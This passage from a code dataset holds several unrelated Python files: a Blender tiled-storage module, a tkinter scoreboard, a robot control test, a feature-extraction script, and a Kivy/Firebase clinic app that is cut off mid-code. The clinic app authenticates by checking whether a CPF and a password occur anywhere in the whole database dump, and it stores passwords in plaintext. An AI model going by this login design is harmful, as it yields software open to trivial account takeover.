UDIM tiles or updates\n the copies of any that have already been added. Any images with\n incompatible colorspaces are ignored. Also removes any tiles\n for which the images are no longer valid (e.g. if they have\n been deleted).\n \"\"\"\n is_srgb = not self.is_data\n\n self._clear_invalid_tiles()\n\n # Images that already have a tile assigned\n existing = set(self.tiles.values())\n\n # Filter out images with incorrect colorspaces\n images = {x for x in images\n if (x.colorspace_settings.name == \"sRGB\") == is_srgb}\n\n for img in images:\n if img in existing:\n try:\n self.rewrite_image(img)\n except ValueError as e:\n warnings.warn(str(e))\n else:\n self.add_image(img)\n if images:\n self.reload()\n\n def on_load(self) -> None:\n \"\"\"Called after a .blend file is loaded. Does nothing if the\n TiledStorage has not been initialized.\n \"\"\"\n if not self.is_initialized:\n return\n\n # Set the filepath of the UDIM to be in the new tempdir\n filename = os.path.basename(self.udim_image.filepath_raw)\n self.udim_image.filepath_raw = os.path.join(bpy.app.tempdir, filename)\n\n self._clear_invalid_tiles()\n\n # Rewrite all images to disk\n for img in self.tiles.values():\n self.rewrite_image(img)\n\n def reload(self) -> None:\n \"\"\"Reloads all tiles from disk.\"\"\"\n self.udim_image.reload()\n\n def _clear_invalid_tiles(self) -> None:\n \"\"\"Deletes all tiles that no longer have a valid image (e.g. if\n the image has been deleted).\n \"\"\"\n tiles = self.tiles\n invalid = [num for num, img in tiles.items() if img is None]\n for num in invalid:\n self.remove_image_by_number(int(num))\n\n def _get_filepath(self, number: int) -> str:\n \"\"\"Returns the filepath of the UDIM tile with the given number.\"\"\"\n return self.udim_image.filepath_raw.replace(\"\", str(number))\n\n def _delete_tile_file(self, number: int) -> None:\n filepath = self._get_filepath(number)\n\n # Do nothing if no file exists\n if not os.path.exists(filepath):\n return\n\n # Only delete files in Blender's temp dir\n if bpy.path.is_subdir(filepath, bpy.app.tempdir):\n try:\n os.remove(filepath)\n except IOError as e:\n warnings.warn(f\"Could not delete {filepath}: {e}\")\n else:\n warnings.warn(f\"File {filepath} is not in this blend file's \"\n \"temporary directory.\")\n\n def _save_image_as_tile(self, image: Image, number: int) -> None:\n \"\"\"Saves image to disk as the UDIM tile given by number.\"\"\"\n # N.B. Need to save first tile as float, otherwise Blender will\n # load all tiles as int\n if self.is_srgb:\n fmt = 'PNG'\n else:\n fmt = ('OPEN_EXR'\n if image.is_float or number == 1001\n else 'PNG')\n save_image_copy(image,\n self._get_filepath(number),\n image_format=fmt)\n\n def _gen_default_first_tile(self, number=1001) -> None:\n op_caller = utils.ops.OpCaller(bpy.context, edit_image=self.udim_image)\n\n op_kwargs = {\"width\": 32,\n \"height\": 32,\n \"float\": not self.is_srgb,\n \"alpha\": False}\n\n tile = self.udim_image.tiles.get(number)\n if tile is None:\n op_caller.call(bpy.ops.image.tile_add, number=number, **op_kwargs)\n else:\n self.udim_image.tiles.active = tile\n op_caller.call(bpy.ops.image.tile_fill, **op_kwargs)\n\n @property\n def is_data(self) -> bool:\n \"\"\"True if this TiledStorage is for non-color data, False if\n this TiledStorage is for sRGB data.\"\"\"\n return self[\"is_data\"]\n\n @property\n def is_srgb(self) -> bool:\n \"\"\"True if this TiledStorage is for sRGB data.\"\"\"\n return not self[\"is_data\"]\n\n @property\n def is_initialized(self) -> bool:\n return self.udim_image is not None\n\n @property\n def image_manager(self):\n return self.layer_stack.image_manager\n\n @property\n def layer_stack(self):\n return get_layer_stack_from_prop(self)\n\n @property\n def _next_free_number(self) -> int:\n \"\"\"The number of the lowest available UDIM tile.\"\"\"\n existing: Set[str] = set(self.tiles.keys())\n for x in range(1001, 2000):\n if str(x) not in existing:\n return x\n raise RuntimeError(\"Cannot find free tile between 1001 and 2000\")\n\n @property\n def tiles(self):\n \"\"\"Returns a map of UDIM tile numbers (as strings) to the image\n that the tile contains a copy of.\n \"\"\"\n try:\n return self[\"tiles\"]\n except KeyError:\n self[\"tiles\"] = {}\n return self[\"tiles\"]\n\n\ndef add_tiled_helper_nodes(img_node: bpy.types.ShaderNodeTexImage,\n tile_num: int,\n uv_map_name: str) -> None:\n \"\"\"Adds nodes to map input of img_node to UDIM tile index\n tile_num.\n \"\"\"\n node_tree = img_node.id_data\n\n # Node to translate UV coords onto the correct UDIM tile\n uv_shift = node_tree.nodes.new(\"ShaderNodeVectorMath\")\n uv_shift.name = f\".pml_tiled_storage.{uv_shift.name}\"\n uv_shift.label = f\"{img_node.label} Map UVs\"\n uv_shift.operation = 'ADD'\n uv_shift.parent = img_node.parent\n uv_shift.location = (img_node.location.x - 200, img_node.location.y)\n uv_shift.width = 120\n uv_shift.hide = True\n\n # Set the value of the second input of the Vector Math node\n shift_vec = uv_shift.inputs[1].default_value\n shift_vec[0] = (tile_num - 1) % 10 # x coord of the UDIM tile\n shift_vec[1] = (tile_num - 1001) // 10 # y coord of the UDIM tile\n\n uv_map = node_tree.nodes.new(\"ShaderNodeUVMap\")\n uv_map.name = f\".pml_tiled_storage.{uv_map.name}\"\n uv_map.parent = img_node.parent\n uv_map.location = (uv_shift.location.x - 200, uv_shift.location.y)\n uv_map.uv_map = uv_map_name\n uv_map.hide = True\n\n node_tree.links.new(img_node.inputs[0], uv_shift.outputs[0])\n node_tree.links.new(uv_shift.inputs[0], uv_map.outputs[0])\n\n\ndef remove_tiled_helper_nodes(img_node: bpy.types.ShaderNodeTexImage) -> None:\n nodes = img_node.id_data.nodes\n\n if not img_node.inputs[0].is_linked:\n return\n\n shift_node = img_node.inputs[0].links[0].from_node\n if not shift_node.name.startswith(\".pml_tiled_storage\"):\n return\n\n if shift_node.inputs[0].is_linked:\n uv_map = shift_node.inputs[0].links[0].from_node\n if uv_map.name.startswith(\".pml_tiled_storage\"):\n nodes.remove(uv_map)\n nodes.remove(shift_node)\n\n\ndef add_nodes_to_tiled_storage(layer_stack,\n *nodes: bpy.types.ShaderNodeTexImage\n ) -> None:\n nodes = [x for x in nodes\n if isinstance(x, bpy.types.ShaderNodeTexImage)\n and x.image is not None\n and x.image.source in ('FILE', 'GENERATED')]\n\n im = layer_stack.image_manager\n\n images = set(x.image for x in nodes)\n im.update_tiled_storage(images)\n\n for node in nodes:\n tiled_storage, tile_num = im.find_in_tiled_storage(node.image)\n if tiled_storage is None:\n continue\n\n node.label = node.image.name\n node[\"pml_tiled_storage_old_image\"] = node.image\n\n node.image = tiled_storage.udim_image\n node.hide = True\n\n add_tiled_helper_nodes(node, tile_num, layer_stack.uv_map_name)\n\n\ndef remove_from_tiled_storage(layer_stack,\n *nodes: bpy.types.ShaderNodeTexImage) -> None:\n im = layer_stack.image_manager\n\n nodes = {x for x in nodes\n if is_tiled_storage_node(x)}\n\n for node in nodes:\n old_img = node[\"pml_tiled_storage_old_image\"]\n im.remove_from_tiled_storage(old_img)\n\n node.image = old_img\n del node[\"pml_tiled_storage_old_image\"]\n\n remove_tiled_helper_nodes(node)\n\n\ndef is_tiled_storage_node(node: bpy.types.ShaderNodeTexImage) -> bool:\n \"\"\"Returns True if an Image Texture is set-up to refer to a tile\n of a TiledStorage instance.\n \"\"\"\n return \"pml_tiled_storage_old_image\" in node\n\n\ndef tiled_storage_enabled(layer_stack) -> bool:\n \"\"\"Returns True if layer_stack currently uses tiled storage.\"\"\"\n return layer_stack.image_manager.uses_tiled_storage\n\n\ndef register():\n bpy.utils.register_class(TiledStorage)\n\n\ndef unregister():\n bpy.utils.unregister_class(TiledStorage)\n","repo_name":"avelgest/principled-material-layers","sub_path":"principled_material_layers/tiled_storage.py","file_name":"tiled_storage.py","file_ext":"py","file_size_in_byte":13414,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"94"} +{"seq_id":"33849816588","text":"from tkinter import *\r\nimport pickle\r\n\r\nlist = []\r\nwith open('Snakescore.txt','rb') as scb:\r\n l = pickle.load(scb)\r\n \r\n list.append(l)\r\n\r\nwith open('Collectscore.txt','rb') as cscb:\r\n m = pickle.load(cscb)\r\n \r\n list.append(m)\r\n\r\nwith open('GTNscore.txt','rb') as Gscb:\r\n n = pickle.load(Gscb)\r\n \r\n \r\n list.append(n)\r\n\r\n\r\nwith open('TILEscore.txt','rb') as Tscb:\r\n o = pickle.load(Tscb)\r\n \r\n list.append(o)\r\n\r\n\r\n\r\nroot = Tk()\r\nroot.title(\"SCORE BOARD\")\r\nroot.configure(bg='black')\r\nroot.geometry('400x400')\r\nroot.iconbitmap(\"C:\\\\JL\\\\Justice_League_dc_comic_logo_movie-512.ico\")\r\ntitle = Label(root, text='SCORE BOARD', font=('Fixedsys', 35, 'normal'), fg='white', bg='black').pack()\r\nGtn = Label(root, text='Guess the Number : {}'.format(n['GTN']), font=('Fixedsys', 15, 'normal'), fg='white', bg='black')\r\nGtn.place(x = 80, y = 120)\r\ntiles = Label(root, text='Tiles : {}'.format(o['TILES']), font=('Fixedsys', 15, 'normal'), fg='white', bg='black')\r\ntiles.place(x = 80, y = 170)\r\nSnake = Label(root, text='Snake : {}'.format(l['snake']), font=('Fixedsys', 15, 'normal'), fg='white', bg='black')\r\nSnake.place(x = 80, y = 220)\r\nCollector = Label(root, text='Collector : {}'.format(m['Collector']), font=('Fixedsys', 15, 'normal'), fg='white', bg='black')\r\nCollector.place(x = 80, y = 270)\r\n \r\n\r\nroot.mainloop()","repo_name":"suraj7026/Arcade-JL","sub_path":"Scoreboard.py","file_name":"Scoreboard.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"22972938829","text":"import numpy as np\nimport time\nimport threading\nfrom snifferpy import RobotClient, CommandType\nimport matplotlib.pyplot as plt\n\n\nif __name__ == '__main__':\n cli = RobotClient(host='10.0.0.11', port=8080)\n\n kp_left = 0.0\n ki_left = 1.0\n kd_left = 0.0\n tau_left = 0.0\n kp_right = 0.0\n ki_right = 1.0\n kd_right = 0.0\n tau_right = 0.0\n v_left = np.hstack((np.zeros(2), 200 * np.ones(5), np.zeros(5)))\n v_right = np.hstack((np.zeros(2), -200 * np.ones(5), np.zeros(5)))\n\n cli.connect()\n\n cli.set_setpoints(setpoints_type=CommandType.PID_LEFT,\n setpoints=np.array([[kp_left, ki_left, kd_left, tau_left]]))\n cli.talk()\n\n cli.set_setpoints(setpoints_type=CommandType.PID_RIGHT,\n setpoints=np.array([[kp_right, ki_right, kd_right, tau_right]]))\n cli.talk()\n\n cli.set_setpoints(setpoints_type=CommandType.SPEED_CTRL,\n setpoints=np.hstack((v_left[:, None], v_right[:, None])))\n\n fig, axs, lines = cli.plot_measurements(interval=np.zeros(0, dtype=int))\n\n thread1 = threading.Thread(target=cli.talk)\n\n cli.talk()\n thread1.start()\n\n display_cnt = 0\n while thread1.is_alive():\n measurements_cnt = cli.measurements_cnt\n if display_cnt < measurements_cnt:\n cli.update_measurements(fig, axs, lines, interval=slice(display_cnt, measurements_cnt))\n display_cnt = measurements_cnt\n time.sleep(2)\n cli.close()\n if display_cnt < cli.measurements_cnt:\n cli.update_measurements(fig, axs, lines, interval=slice(display_cnt, cli.measurements_cnt))\n plt.show()\n","repo_name":"rafael-phd/SnifferRobotPy","sub_path":"test_speed_ctrl_w_pid.py","file_name":"test_speed_ctrl_w_pid.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"33583111075","text":"import json\nimport shutil\nfrom pathlib import Path\nfrom typing import Tuple\n\nimport hydra\nimport numpy as np\nimport yaml\nfrom hydra.core.hydra_config import HydraConfig\nfrom hydra.utils import instantiate\nfrom loguru import logger\nfrom omegaconf import DictConfig, OmegaConf\n\nfrom rl_benchmarks.models import ParallelExtractor\nfrom rl_benchmarks.utils import (\n extract_from_tiles,\n get_tile_config,\n set_seed,\n)\nfrom rl_benchmarks.constants import (\n AVAILABLE_COHORTS,\n PREPROCESSED_DATA_DIR,\n TILE_SIZES,\n)\n\n\n@hydra.main(\n version_base=None,\n config_path=\"../../conf/extract_features/\",\n config_name=\"tile_config\",\n)\ndef extract_tile_features(params: DictConfig) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Perform feature extraction for a given dataset of images. The Hydra configuration\n file can be found in `conf/extract_features/tile_config.yaml`.\n See `conf/extract_features/tile_dataset` and `conf/extract_features/feature_extractor`\n for the list of available tiles datasets and feature extractors, respectively.\n \"\"\"\n # Set seed for features extraction (in case of random subsampling).\n set_seed()\n\n # Prepare output directory.\n features_output_dir = params[\"features_output_dir\"]\n dataset_cfg = params[\"tile_dataset\"]\n cohort = dataset_cfg[\"cohort\"]\n if features_output_dir is None:\n if cohort not in AVAILABLE_COHORTS:\n raise ValueError(\n f\"{cohort} is not found. Available cohorts can be found in\"\n \" ``rl_benchmarks.constants::AVAILABLE_COHORTS``.\"\n )\n else:\n features_output_dir = Path(features_output_dir)\n hydra_cfg = OmegaConf.to_container(HydraConfig.get().runtime.choices)\n feature_extractor_name = hydra_cfg[\"feature_extractor\"]\n # Features output directory.\n features_output_dir = (\n PREPROCESSED_DATA_DIR\n / \"tile_classification\"\n / \"features\"\n / feature_extractor_name\n / cohort\n )\n features_output_dir.mkdir(exist_ok=True, parents=True)\n logger.info(f\"Storage folder: {features_output_dir}.\")\n\n # Define parameters for features extraction process.\n dataset_cfg = params[\"tile_dataset\"]\n feature_extractor_cfg = params[\"feature_extractor\"]\n tile_size = params[\"tile_size\"]\n if tile_size == \"auto\":\n tile_size = TILE_SIZES[feature_extractor_name]\n else:\n assert (\n TILE_SIZES[feature_extractor_name] == tile_size\n ), f\"Please specify a tile size (in pixels) that matches the original implementation, see constants.TILE_SIZES dictionary for details: {TILE_SIZES}\"\n\n num_workers = params[\"num_workers\"]\n batch_size = params[\"batch_size\"]\n device = params[\"device\"]\n\n # Get slides paths.\n get_dataset = instantiate(dataset_cfg)\n dataset = get_dataset()\n\n # Save output configuration.\n hydra_cfg = hydra.core.hydra_config.HydraConfig.get()\n hydra_features_output_dir = Path(hydra_cfg[\"runtime\"][\"output_dir\"])\n hydra_yaml_cfg = hydra_features_output_dir / \".hydra\" / \"config.yaml\"\n\n with open(hydra_yaml_cfg, \"r\", encoding=\"utf-8\") as stream:\n hydra_yaml_cfg = yaml.safe_load(stream)\n\n output_cfg = get_tile_config(\n params,\n features_output_dir,\n tile_paths=list(dataset.image_path.values),\n tile_ids=list(dataset.image_id.values),\n hydra_yaml_cfg=hydra_yaml_cfg,\n )\n with open(\n features_output_dir / \"rlbenchmarks_extraction_params.json\",\n \"w\",\n encoding=\"utf-8\",\n ) as fp:\n json.dump(output_cfg, fp)\n\n shutil.copyfile(\n Path(__file__).resolve(),\n features_output_dir / \"rlbenchmarks_extraction_script.py\",\n )\n\n # Get features storage paths.\n tile_features_path = features_output_dir / \"tile_features.npy\"\n tile_ids_path = features_output_dir / \"tile_ids.npy\"\n\n if tile_features_path.exists():\n dataset_features = np.load(tile_features_path)\n if len(dataset) == len(dataset_features):\n logger.info(\n f\"Extraction already done. Features saved at: {tile_features_path}\"\n )\n\n # Instantiate feature extractor.\n extractor = instantiate(feature_extractor_cfg)\n extractor = ParallelExtractor(\n extractor,\n gpu=device,\n )\n\n # Extract features.\n tile_features, tile_ids = extract_from_tiles(\n dataset_tiles=dataset,\n feature_extractor=extractor,\n tile_size=tile_size,\n num_workers=num_workers,\n batch_size=batch_size,\n )\n\n # Save features and tiles ids.\n np.save(str(tile_features_path), tile_features)\n np.save(str(tile_ids_path), tile_ids)\n\n\nif __name__ == \"__main__\":\n extract_tile_features() # pylint: disable=no-value-for-parameter\n","repo_name":"owkin/HistoSSLscaling","sub_path":"tools/extract_features/extract_tile_features.py","file_name":"extract_tile_features.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"94"} +{"seq_id":"74498171510","text":"import json\nimport threading\n\nimport pyrebase\nimport requests\nfrom kivy.clock import Clock, mainthread\nfrom kivy.core.window import Window\nfrom kivy.lang import Builder\nfrom kivy.metrics import dp\nfrom kivy.uix.screenmanager import Screen, ScreenManager\nfrom kivymd.app import MDApp\nfrom kivymd.uix.datatables import MDDataTable\nfrom kivymd.uix.picker import MDDatePicker\n\nglobal firebaseConfig\nglobal firebase2 \nglobal lista2\nglobal HORARIOS_SELECIONADOS\n\nfirebaseConfig={\n \n#PUT THE KEYS TO YOUR FIREBASE DATABASE HERE\n\n};\n\n\nfirebase2 = pyrebase.initialize_app(firebaseConfig)\nlista2 = []\nHORARIOS_SELECIONADOS = [] \n\n\n# Redireciona para a tela de login\ndef callbackregister(self, *args):\n MDApp.get_running_app().root.current = 'login'\n\n# Cria o registro do usuario e posta as informações na base de dados do firebase (realtime database) \ndef create_post(self, nome, cpf, senha):\n #firebase_url = \" \" \n #auth_key = ' ' \n\n lista = []\n request = requests.get(self.firebase_url + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n \n try: \n to_database = '{\"Nome\": 'f'{json.dumps(nome)}'', \"CPF\" : 'f'{json.dumps(cpf)}'', \"Senha\" : 'f'{json.dumps(senha)}''}'\n\n \n if nome == \"\":\n self.ids.lbregister.text = \"Insira nome\"\n\n elif cpf == \"\":\n self.ids.lbregister.text = \"Insira CPF\"\n\n elif senha == \"\":\n self.ids.lbregister.text = \"Insira Senha\" \n\n elif len(cpf) < 11:\n self.ids.lbregister.text = \"CPF inválido, tente novamente\"\n\n elif len(senha) < 10:\n self.ids.lbregister.text = \"Senha precisa de pelo menos 10 caracteres\" \n\n elif cpf in res:\n self.ids.lbregister.text = \"CPF já cadastrado\"\n\n else:\n #requests.post(url = self.firebase_url, json = to_database2)\n requests.post(url = self.firebase_url, json = json.loads(to_database))\n\n self.ids.lbregister.text = \"Cadastrado com sucesso! Redirecionando para a tela de login...\"\n Clock.schedule_once(self.callbackregister, 3)\n\n\n lista.append(nome)\n lista.append(cpf)\n lista.append(senha)\n\n \n with open(f'{cpf}.txt',\"w\") as a:\n a.write(str(lista[0]))\n a.write(\"\\n\")\n a.write(str(lista[1]))\n a.write(\"\\n\")\n a.write(str(lista[2]))\n \n except ValueError:\n pass \n\n lista.clear\n\n# Redireciona para o dashboard\ndef callbacklogin(self, *args):\n MDApp.get_running_app().root.current = 'dashboard'\n\n \n# Autentica o usuario de acordo com as informações que são coletadas do banco de dados firebase\ndef get_post(self, cpf, senha):\n request = requests.get(self.firebase_url + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n \n \n if (cpf != '' and senha != ''):\n if (len(cpf) == 11 and cpf in res) and (len(senha) >= 10 and senha in res):\n self.ids.lblogin.text = \"Logado com sucesso! Redirecionando para a tela inicial...\" \n Clock.schedule_once(self.callbacklogin, 3)\n nome = list(open(f'{cpf}.txt', \"r\"))\n nome = nome[0]\n id = list(open(f'{cpf}.txt', \"r\"))\n id = id[2]\n with open(\"autenticado.txt\", \"w\") as f: \n f.write(str(nome))\n f.write(str(cpf))\n f.write(\"\\n\")\n f.write(str(id)) \n\n else: \n self.ids.lblogin.text = \"CPF ou senha inválidos, tente novamente\" \n\n\n else: \n if(cpf == ''):\n self.ids.lblogin.text = \"Insira o CPF logar\"\n\n elif(senha == ''):\n self.ids.lblogin.text = \"Insira a senha para logar\"\n\n\n elif (cpf == '' and senha == ''):\n self.ids.lblogin.text = \"Insira os dados para logar\" \n\n\n# Redefine senha \n\ndef redf_passwd(self, cpf, senha):\n request = requests.get(self.firebase_url + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n \n if cpf == \"\":\n self.ids.lbredfsenha.text = \"Insira o cpf\"\n elif cpf not in res:\n self.ids.lbredfsenha.text = \"CPF não cadastrado\"\n elif len(cpf) < 11:\n self.ids.lbredfsenha.text = \"CPF Inválido\"\n elif senha == \"\": \n self.ids.lbredfsenha.text = \"Insira a nova senha\"\n elif len(senha) < 10:\n self.ids.lbredfsenha.text = \"Senha precisa ter pelo menos 10 caracteres\"\n \n else:\n db = firebase2.database()\n user = db.child(\"Users\").get()\n for usuario in user.each():\n if usuario.val()['CPF'] == f'{cpf}' :\n db.child(\"Users\").child(usuario.key()).update({'Senha': f'{senha}'})\n a = open(f'{cpf}.txt', \"r\")\n list_of_lines = a.readlines() \n list_of_lines[2] = f'{senha}'\n a = open(f'{cpf}.txt', \"w\")\n a.writelines(list_of_lines) \n a.close()\n \n self.ids.lbredfsenha.text = \"Senha redefinida com sucesso!\"\n\n\n# Edita as informações do usuário \n\ndef change_screen(self, nome, cpf, id):\n nome2 = list(open(\"autenticado.txt\", \"r\"))\n nome2 = nome2[0]\n cpf2 = list(open(\"autenticado.txt\", \"r\"))\n cpf2 = cpf2[1]\n id2 = list(open(\"autenticado.txt\", \"r\"))\n id2 = id2[2]\n \n\n db = firebase2.database()\n user = db.child(\"Users\").get()\n for usuario in user.each():\n if usuario.val()['Nome'] in nome2:\n if f'{nome}' != \"\":\n db.child(\"Users\").child(usuario.key()).update({'Nome': f'{nome}'})\n \n f = open(\"autenticado.txt\", \"r\")\n list_of_lines = f.readlines() \n list_of_lines[0] = f'{nome}\\n'\n f = open(\"autenticado.txt\", \"w\")\n f.writelines(list_of_lines) \n f.close()\n self.ids.lbchange.text = \"Nome alterado com sucesso!\"\n\n \n if usuario.val()['CPF'] in cpf2:\n if f'{cpf}' != \"\":\n db.child(\"Users\").child(usuario.key()).update({'CPF': f'{cpf}'})\n\n a = open(\"autenticado.txt\", \"r\")\n list_of_lines = a.readlines() \n list_of_lines[1] = f'{cpf}\\n'\n a = open(\"autenticado.txt\", \"w\")\n a.writelines(list_of_lines) \n a.close()\n self.ids.lbchange.text = \"CPF alterado com sucesso!\"\n \n\n if usuario.val()['Senha'] in id2:\n if f'{id}' != \"\":\n db.child(\"Users\").child(usuario.key()).update({'Senha': f'{id}'})\n\n b = open(\"autenticado.txt\", \"r\")\n list_of_lines = b.readlines() \n list_of_lines[2] = f'{id}\\n'\n b = open(\"autenticado.txt\", \"w\")\n b.writelines(list_of_lines) \n b.close()\n self.ids.lbchange.text = \"ID alterado com sucesso!\"\n\n self.ids.lbchange.text = \"Dados alterados com sucesso!\"\n \n with open(f'{cpf}.txt', \"w\") as op:\n op.write(str(nome))\n op.write(\"\\n\")\n op.write(str(cpf))\n op.write(\"\\n\")\n op.write(str(id))\n\n\n# Salva a data escolhida pelo usuario\ndef on_save(self, instance, value, date_range):\n self.ids.data.text = str(value) \n\n# Mostra a mensagem quando o usuario cancela a data\ndef on_cancel(self, instance, value):\n self.ids.data.text = \"Você cliclou em cancelar\"\n\n# Cria o calendario\ndef show_data_picker(self):\n date_dialog = MDDatePicker(year=2022, month=6, day=17)\n date_dialog.bind(on_save=self.on_save, on_cancel=self.on_cancel)\n date_dialog.open() \n\n\n# Cria a consulta e salva no banco de dados firebase\ndef check(self, especialidade, data, paciente):\n #firebase_url = \" \" \n #firebase_url2 = \" \" \n\n #auth_key = ' '\n\n request = requests.get(self.firebase_url + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n\n request2 = requests.get(self.firebase_url2 + '?auth=' + self.auth_key)\n res2 = json.dumps(request2.json()) \n\n if especialidade == \"\":\n self.ids.lbcheckin.text = \"Insira a especialidade\"\n elif paciente not in res2:\n self.ids.lbcheckin.text = \"Paciente não registrado\"\n elif paciente == \"\":\n self.ids.lbcheckin.text = \"Insira ID do paciente\"\n\n else:\n to_database = '{\"Especialidade\": 'f'{json.dumps(especialidade)}'', \"Data\": 'f'{json.dumps(data)}'', \"ID do paciente\": 'f'{json.dumps(paciente)}''}' \n db = firebase2.database()\n pacients = db.child(\"Pacients\").get()\n for paciente2 in pacients.each():\n if paciente2.val()['ID Paciente'] == f'{paciente}':\n db.child(\"Pacients\").child(paciente2.key()).update({'Tipo de tratamento' : f'{especialidade}'}) \n\n try:\n \n requests.post(url = self.firebase_url, json = json.loads(to_database))\n self.ids.lbcheckin.text = \"Consultada agendada com sucesso!\"\n\n\n except ValueError:\n pass \n\n\ndef on_save2(self, instance, value, date_range):\n self.ids.data.text = str(value) \n\ndef on_cancel2(self, instance, value):\n self.ids.data.text = \"Você cliclou em cancelar\"\n\ndef show_data_picker2(self):\n date_dialog = MDDatePicker(year=2022, month=6, day=17)\n date_dialog.bind(on_save=self.on_save2, on_cancel=self.on_cancel2)\n date_dialog.open() \n\n# Cria a retirada de medicamentos \n\ndef checkout(self, med, data, paciente2):\n #firebase_url = \" \" \n #firebase_url2 = \" \"\n #firebase_url3 = \" \"\n #auth_key = ' '\n \n request = requests.get(self.firebase_url3 + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n request2 = requests.get(self.firebase_url2 + '?auth=' + self.auth_key)\n res2 = json.dumps(request2.json()) \n\n if med not in res2:\n self.ids.lbcheckout.text = \"Medicamento fora de estoque\"\n elif med == \"\":\n self.ids.lbcheckout.text = \"Insira nome do medicamento \"\n elif paciente2 not in res:\n self.ids.lbcheckout.text = \"Paciente não registrado\"\n elif paciente2 == \"\":\n self.ids.lbcheckout.text = \"Insira ID do paciente\"\n\n else:\n to_database = '{\"Medicamento\": 'f'{json.dumps(med)}'', \"Data\": 'f'{json.dumps(data)}'', \"ID Paciente\": 'f'{json.dumps(paciente2)}''}'\n #to_database1 = '{\"Data\": 'f'{data}''}'\n\n try:\n requests.post(url = self.firebase_url, json = json.loads(to_database))\n self.ids.lbcheckout.text = \"Retirada agendada com sucesso!\"\n #requests.post(url = self.firebase_url, json = json.dumps(to_database1))\n\n except ValueError:\n pass \n\n\n# Cria o estoque de medicamentos (entrada e saida dos mesmos)\n\ndef create_post_meds(self, nome_med, quantidade, id_med):\n #firebase_url = \" \" \n #auth_key = ' ' \n request = requests.get(self.firebase_url + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n \n if nome_med == \"\":\n self.ids.lbmeds.text = \"Insira medicamento\"\n elif quantidade == \"\":\n self.ids.lbmeds.text = \"Insira quantidade maior que 0\"\n elif id_med == \"\":\n self.ids.lbmeds.text = \"Insira o id do med\" \n\n else:\n try: \n to_database = '{\"Nome do medicamento\": 'f'{json.dumps(nome_med)}'', \"Quantidade\" : 'f'{json.dumps(quantidade)}'', \"ID medicamento\" : 'f'{json.dumps(id_med)}''}'\n\n requests.post(url = self.firebase_url, json = json.loads(to_database))\n\n self.ids.lbmeds.text = \"Medicamento adicionado ao estoque!\" \n\n except ValueError:\n pass \n\n lista2.append(int(quantidade)) \n\n with open(\"meds.txt\", \"a\") as fp:\n for item in lista2:\n fp.write(\"%d\\n\" % item) \n\n\ndef create_delete(self, nome_med, quantidade, id_med):\n #firebase_url = \" \" \n #auth_key = ' '\n \n request = requests.get(self.firebase_url + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n \n to_database = '{\"Nome do medicamento\": 'f'{json.dumps(nome_med)}'', \"Quantidade\" : 'f'{json.dumps(quantidade)}'', \"ID medicamento\" : 'f'{json.dumps(id_med)}''}'\n\n if nome_med == \"\":\n self.ids.lbmeds.text = \"Insira medicamento\"\n elif quantidade == \"\":\n self.ids.lbmeds.text = \"Insira quantidade maior que 0\"\n elif id_med == \"\":\n self.ids.lbmeds.text = \"Insira o id do med\" \n\n else:\n\n with open(\"meds.txt\", \"r\") as fp:\n conteudo = fp.readlines()\n for conteudos in conteudo:\n lista2.append(int(conteudos)) \n fp.close() \n\n new_quant = (lista2[int(id_med)] - int(quantidade)) \n\n db = firebase2.database()\n meds = db.child(\"Meds\").get()\n for meds2 in meds.each():\n if meds2.val()['ID medicamento'] == f'{id_med}':\n db.child(\"Meds\").child(meds2.key()).update({'Quantidade' : f'{new_quant}'}) \n\n a = open(\"meds.txt\", \"r\")\n list_of_lines = a.readlines() \n list_of_lines[int(id_med)] = f'{new_quant}\\n'\n a = open(\"meds.txt\", \"w\")\n a.writelines(list_of_lines) \n a.close()\n\n self.ids.lbmeds.text = \"Medicamento retirado do estoque\" \n\n\n# Cria tabela e lista os medicamentos\n\nstop = threading.Event()\n\ndef on_stop(self):\n self.stop.set()\n\ndef on_enter(self):\n self.start_second_thread()\n\ndef start_second_thread(self):\n threading.Thread(target=self.load_data).start()\n\ndef load_data(self, *args): \n get_request = requests.get(f' ')\n consultas_data = json.loads(get_request.content.decode())\n\n count = 0\n cols = [\"Código\"]\n values = []\n for consultas, dado in consultas_data.items():\n lista = []\n lista.append(consultas)\n\n for key, info in dado.items():\n lista.append(info)\n \n if count == 0:\n cols.append(key) \n count+=1 \n values.append(lista)\n\n self.data_table(cols, values) \n\n \n@mainthread\ndef data_table(self, cols, values): \n self.data_tables = MDDataTable( \n pos_hint={'center_y': 0.5, 'center_x': 0.5},\n size_hint=(0.9, 0.6),\n column_data=[\n (col, dp(40))\n for col in cols \n ],\n row_data=values,\n check=True\n ) \n\n self.add_widget(self.data_tables)\n\n# Mostra os dados sobre o usuário\n\ndef on_enter2(self):\n #firebase_url = \" \" \n auth_key = ' ' \n \n nome = list(open('autenticado.txt', 'r'))\n nome = nome[0]\n cpf = list(open('autenticado.txt', 'r'))\n cpf = cpf[1]\n id = list(open('autenticado.txt', 'r')) \n id = id[2]\n self.ids.cpffuncionario.text = cpf \n self.ids.nomefuncionario.text = nome\n self.ids.idfuncionario.text = id\n\n\n# Registra os pacientes e coloca os dados diretamente no banco de dados firebase\n\ndef callbackregisterpacientes(self, *args):\n MDApp.get_running_app().root.current = 'login'\n\ndef create_post_pacient(self, nome2, cpf2, senha2):\n #firebase_url = \" \"\n #auth_key = ' ' \n request = requests.get(self.firebase_url + '?auth=' + self.auth_key)\n res = json.dumps(request.json()) \n \n try: \n to_database = '{\"Nome\": 'f'{json.dumps(nome2)}'', \"CPF\" : 'f'{json.dumps(cpf2)}'', \"ID Paciente\" : 'f'{json.dumps(senha2)}''}'\n\n\n if len(cpf2) != 11:\n self.ids.lbregister_pacient.text = \"CPF inválido, tente novamente\"\n\n elif len(cpf2) < 10:\n 